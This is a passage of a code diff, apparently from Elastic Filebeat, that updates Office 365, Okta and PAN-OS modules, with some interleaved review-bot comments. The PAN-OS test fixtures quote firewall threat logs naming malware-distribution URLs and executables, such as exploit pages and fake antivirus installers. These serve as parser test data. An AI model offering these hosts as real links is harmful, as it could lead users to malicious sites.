"root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -1553,6 +1572,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, 
@@ -1605,6 +1625,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1657,6 +1678,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1709,6 +1731,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1761,6 +1784,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1813,6 +1837,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1879,6 +1904,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1931,6 +1957,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1983,6 +2010,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -2060,6 +2088,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, 
@@ -2130,6 +2159,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -2207,6 +2237,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2284,6 +2315,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2361,6 +2393,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2438,6 +2471,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2515,6 +2549,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2592,6 +2627,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2682,6 +2718,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", 
@@ -2776,6 +2813,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -2870,6 +2908,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -2964,6 +3003,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -3256,6 +3296,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -3352,6 +3393,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", 
@@ -3446,6 +3488,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/okta/fields.go b/x-pack/filebeat/module/okta/fields.go index 24c40aebc4f..749c3ee54db 100644 --- a/x-pack/filebeat/module/okta/fields.go +++ b/x-pack/filebeat/module/okta/fields.go @@ -19,5 +19,5 @@ func init() { // AssetOkta returns asset data. // This is the base64 encoded gzipped contents of module/okta. func AssetOkta() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/okta/system/_meta/fields.yml b/x-pack/filebeat/module/okta/system/_meta/fields.yml index 5bf5ee9c8d5..794d1cfa770 100644 --- a/x-pack/filebeat/module/okta/system/_meta/fields.yml +++ b/x-pack/filebeat/module/okta/system/_meta/fields.yml @@ -62,7 +62,7 @@ Display name of the actor. - name: client - title: Client + title: Client short: Fields about the client of the actor. description: > Fields that let you store information about the client of the actor. @@ -73,18 +73,18 @@ type: ip description: > The IP address of the client. - + - name: user_agent description: > Fields about the user agent information of the client. type: group fields: - + - name: raw_user_agent type: keyword description: > The raw informaton of the user agent. - + - name: os type: keyword description: > @@ -133,7 +133,7 @@ short: The list of targets. description: > The list of targets. - type: array + type: flattened fields: - name: id @@ -275,7 +275,7 @@ type: group fields: - - name: as + - name: as type: group description: > The autonomous system. 
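Review bot: In the `@@ -133,7 +133,7 @@` hunk of okta/system/_meta/fields.yml, `target` changes to `type: flattened` but keeps its `fields:` list, so the entry no longer says how the children are actually mapped. Only `- name: id` is visible at the end of the hunk; the rest of the list lies outside it. With a flattened mapping Elasticsearch indexes every leaf value as a keyword, so the types declared on those children presumably serve as documentation only. I would say so in the description, for example `The list of targets. Mapped as flattened: sub-fields are searchable as keywords and are not individually typed.`, so that anyone writing queries or detection rules against `okta.target.*` knows what to expect.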
@@ -291,7 +291,7 @@ description: > The organization that owns the AS number. fields: - + - name: name type: keyword description: > diff --git a/x-pack/filebeat/module/okta/system/config/input.yml b/x-pack/filebeat/module/okta/system/config/input.yml index 05ff819fad0..32f3091a4b8 100644 --- a/x-pack/filebeat/module/okta/system/config/input.yml +++ b/x-pack/filebeat/module/okta/system/config/input.yml @@ -12,6 +12,11 @@ request.ssl: {{ .ssl | tojson }} request.timeout: {{ .http_client_timeout }} {{ end }} + +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + request.method: GET request.url: {{ .url }} request.rate_limit: @@ -63,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/okta/system/manifest.yml b/x-pack/filebeat/module/okta/system/manifest.yml index 688f1a9ba44..830c8682de5 100644 --- a/x-pack/filebeat/module/okta/system/manifest.yml +++ b/x-pack/filebeat/module/okta/system/manifest.yml @@ -13,6 +13,7 @@ var: - name: tags default: [forwarded] - name: url + - name: proxy_url - name: initial_interval default: 24h diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json index 226b52efa7d..794b2385a37 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json @@ -74,6 +74,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", 
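Review bot: `request.proxy_url: {{ .proxy_url }}` in the `@@ -12,6 +12,11 @@` hunk of okta/system/config/input.yml renders the variable unquoted, so the value is parsed as a YAML plain scalar and the result depends on whatever characters the operator supplies. The `request.ssl` line at the top of the same hunk already passes its value through `tojson`, and the same filter should give a safely quoted string here: `request.proxy_url: {{ .proxy_url | tojson }}`. A proxy URL may also carry credentials in its userinfo part, so a comment beside the new `- name: proxy_url` entry in manifest.yml, such as `# may embed proxy credentials; treat as a secret`, would help. The `{{ if }}` block that this hunk closes with `{{ end }}` opens before the hunk.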
@@ -157,6 +158,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", @@ -253,6 +255,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/oracle/database_audit/config/config.yml b/x-pack/filebeat/module/oracle/database_audit/config/config.yml index 09552183e0d..99aca1327ff 100644 --- a/x-pack/filebeat/module/oracle/database_audit/config/config.yml +++ b/x-pack/filebeat/module/oracle/database_audit/config/config.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/panw/fields.go b/x-pack/filebeat/module/panw/fields.go index 927d5d4f226..1990a4b7403 100644 --- a/x-pack/filebeat/module/panw/fields.go +++ b/x-pack/filebeat/module/panw/fields.go @@ -19,5 +19,5 @@ func init() { // AssetPanw returns asset data. // This is the base64 encoded gzipped contents of module/panw. func AssetPanw() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/panw/panos/_meta/fields.yml b/x-pack/filebeat/module/panw/panos/_meta/fields.yml index 490befc3e65..4fa1094f56f 100644 --- a/x-pack/filebeat/module/panw/panos/_meta/fields.yml +++ b/x-pack/filebeat/module/panw/panos/_meta/fields.yml @@ -142,3 +142,8 @@ - name: sub_type description: >- Specifies the sub type of the log + + - name: virtual_sys + type: keyword + description: > + Virtual system instance 
diff --git a/x-pack/filebeat/module/panw/panos/config/input.yml b/x-pack/filebeat/module/panw/panos/config/input.yml index 8fa5bd12958..fe5dab98db8 100644 --- a/x-pack/filebeat/module/panw/panos/config/input.yml +++ b/x-pack/filebeat/module/panw/panos/config/input.yml @@ -68,6 +68,7 @@ processors: server.user.name: 13 destination.user.name: 13 network.application: 14 + panw.panos.virtual_sys: 15 panw.panos.source.zone: 16 observer.ingress.zone: 16 panw.panos.destination.zone: 17 @@ -130,6 +131,7 @@ processors: server.user.name: 13 destination.user.name: 13 network.application: 14 + panw.panos.virtual_sys: 15 panw.panos.source.zone: 16 observer.ingress.zone: 16 panw.panos.destination.zone: 17 @@ -209,4 +211,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml index 42d2f4ff9c1..e0bbd9b8c25 100644 --- a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml +++ b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml @@ -223,6 +223,7 @@ processors: if: 'ctx?.panw?.panos?.type == "TRAFFIC"' - append: field: event.category + allow_duplicates: false value: - network_traffic - network @@ -233,6 +234,7 @@ processors: if: 'ctx?.panw?.panos?.type == "THREAT"' - append: field: event.category + allow_duplicates: false value: - security_threat - intrusion_detection @@ -240,10 +242,12 @@ processors: if: 'ctx?.panw?.panos?.type == "THREAT"' - append: field: event.type + allow_duplicates: false value: allowed if: "ctx?.panw?.panos?.action != null && ['alert', 'allow', 'continue'].contains(ctx.panw.panos.action)" - append: field: event.type + allow_duplicates: false value: denied if: "ctx?.panw?.panos?.action != null && ['deny', 'drop', 'reset-client', 'reset-server', 'reset-both', 'block-url', 'block-ip', 'random-drop', 'sinkhole', 'block'].contains(ctx.panw.panos.action)" - set: 
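Review bot: The `allow_duplicates: false` lines added to the `append` processors in panw/panos/ingest/pipeline.yml make deduplication depend on the ingest node recognising that option. This applies to the three hunks here and to the later ones through `@@ -467,8 +475,9 @@`. An Elasticsearch version whose append processor does not know the parameter would presumably reject the whole pipeline at load time, leaving PAN-OS events unparsed, so it is worth confirming the minimum supported version for this module. The `@@ -467,8 +475,9 @@` hunk also removes the explicit `!= ctx?.network?.community_id` guard in favour of the option. I would record that next to the existing comment, for example `# allow_duplicates: false replaces the former inequality check against network.community_id`.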
@@ -258,6 +262,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "start"' - append: field: event.type + allow_duplicates: false value: - start - connection @@ -268,6 +273,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "end"' - append: field: event.type + allow_duplicates: false value: - end - connection @@ -278,6 +284,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "drop"' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -288,6 +295,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "deny"' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -467,8 +475,9 @@ processors: # Append NAT community_id to network.community_id - append: - if: 'ctx?.panw?.panos?.network?.nat?.community_id != null && ctx.panw.panos.network.nat.community_id != ctx?.network?.community_id' + if: 'ctx?.panw?.panos?.network?.nat?.community_id != null' field: network.community_id + allow_duplicates: false value: - '{{panw.panos.network.nat.community_id}}' diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json index a6777dca5e6..bf6ff1e9006 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json @@ -800,6 +800,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json index 10ea226c1ee..5388af2b903 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json 
@@ -69,6 +69,7 @@ "panw.panos.threat.resource": "lorexx.cn/loader.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lorexx.cn" ], @@ -168,6 +169,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=2", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -268,6 +270,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=5", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -368,6 +371,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=7", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -468,6 +472,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -568,6 +573,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -668,6 +674,7 @@ "panw.panos.threat.resource": "liteautobestguide.cn/load.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "liteautobestguide.cn" ], @@ -767,6 +774,7 @@ "panw.panos.threat.resource": "liteautobestguide.cn/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "liteautobestguide.cn" ], 
@@ -866,6 +874,7 @@ "panw.panos.threat.resource": "litetopdetect.cn/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "litetopdetect.cn" ], @@ -965,6 +974,7 @@ "panw.panos.threat.resource": "lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lkmpmlm.com" ], @@ -1065,6 +1075,7 @@ "panw.panos.threat.resource": "girlteenxxxfreemov.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "girlteenxxxfreemov.com" ], @@ -1163,6 +1174,7 @@ "panw.panos.threat.resource": "imagesrepository.com/resolution.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "imagesrepository.com" ], @@ -1262,6 +1274,7 @@ "panw.panos.threat.resource": "hottestfiles.com/search/search.php?q=xxx", "panw.panos.type": "THREAT", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "hottestfiles.com" ], @@ -1361,6 +1374,7 @@ "panw.panos.threat.resource": "infodist1.com/in.cgi?11¶meter=404", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "infodist1.com" ], @@ -1461,6 +1475,7 @@ "panw.panos.threat.resource": "cls-softwares.com/suc.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "cls-softwares.com" ], @@ -1560,6 +1575,7 @@ "panw.panos.threat.resource": "cls-softwares.com/softwarefortubeview.40013.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "cls-softwares.com" ], 
@@ -1655,6 +1671,7 @@ "panw.panos.threat.resource": "findmorepill.com/klik/search.php?q=xxx", "panw.panos.type": "THREAT", "panw.panos.url.category": "online-gambling", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "findmorepill.com" ], @@ -1755,6 +1772,7 @@ "panw.panos.threat.resource": "allowedwebsurfing.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "allowedwebsurfing.com" ], @@ -1853,6 +1871,7 @@ "panw.panos.threat.resource": "antivirus-remote.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-remote.com" ], @@ -1951,6 +1970,7 @@ "panw.panos.threat.resource": "bklinkov.ru/hi/start.cfg", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bklinkov.ru" ], @@ -2050,6 +2070,7 @@ "panw.panos.threat.resource": "blogsexnakedgirlxxx.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "blogsexnakedgirlxxx.com" ], @@ -2148,6 +2169,7 @@ "panw.panos.threat.resource": "bklinkov.ru/hi/start.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bklinkov.ru" ], @@ -2247,6 +2269,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2340,6 +2363,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -2433,6 +2457,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2526,6 +2551,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2619,6 +2645,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2712,6 +2739,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2805,6 +2833,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2898,6 +2927,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2991,6 +3021,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3084,6 +3115,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -3177,6 +3209,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3266,6 +3299,7 @@ "panw.panos.threat.resource": "wantfinest.com/tds/in.cgi?default", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "wantfinest.com" ], @@ -3362,6 +3396,7 @@ "panw.panos.threat.resource": "sameshitasiteverwas.com/traf/tds/in.cgi?2", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "sameshitasiteverwas.com" ], @@ -3458,6 +3493,7 @@ "panw.panos.threat.resource": "svarkon.ru/update.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "svarkon.ru" ], @@ -3556,6 +3592,7 @@ "panw.panos.threat.resource": "onlinescanxpp.com/land/eurl/1.php?code=", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "onlinescanxpp.com" ], @@ -3652,6 +3689,7 @@ "panw.panos.threat.resource": "nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "nolagtime.com" ], @@ -3747,6 +3785,7 @@ "panw.panos.threat.resource": "nolagtime.com/gwc.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "nolagtime.com" ], 
@@ -3845,6 +3884,7 @@ "panw.panos.threat.resource": "karavan.us/bon/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "karavan.us" ], @@ -3940,6 +3980,7 @@ "panw.panos.threat.resource": "findnolimits.com/go.php?sid=1", "panw.panos.type": "THREAT", "panw.panos.url.category": "dead-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "findnolimits.com" ], @@ -4036,6 +4077,7 @@ "panw.panos.threat.resource": "bizoplata.ru/moun.html", "panw.panos.type": "THREAT", "panw.panos.url.category": "parked-domains", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bizoplata.ru" ], @@ -4131,6 +4173,7 @@ "panw.panos.threat.resource": "bizoplata.ru/palast.html", "panw.panos.type": "THREAT", "panw.panos.url.category": "parked-domains", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bizoplata.ru" ], @@ -4218,6 +4261,7 @@ "panw.panos.threat.resource": "controller.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "204.232.231.46", "192.168.0.2", @@ -4319,6 +4363,7 @@ "panw.panos.threat.resource": "www.15min.it/", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "www.15min.it" ], @@ -4413,6 +4458,7 @@ "panw.panos.threat.resource": "tubemov.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "adult-and-pornography", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "tubemov.com" ], @@ -4507,6 +4553,7 @@ "panw.panos.threat.resource": "pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "pagesinxt.com" ], 
@@ -4602,6 +4649,7 @@ "panw.panos.threat.resource": "movfree.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "spyware-and-adware", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "movfree.com" ], @@ -4699,6 +4747,7 @@ "panw.panos.threat.resource": "gometascan.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "gometascan.com" ], @@ -4796,6 +4845,7 @@ "panw.panos.threat.resource": "antivirus-powerful-scannerv2.com/download/Install_11-1.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-powerful-scannerv2.com" ], @@ -4894,6 +4944,7 @@ "panw.panos.threat.resource": "antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-powerful-scannerv2.com" ], @@ -4992,6 +5043,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], @@ -5090,6 +5142,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], @@ -5180,6 +5233,7 @@ "panw.panos.threat.resource": 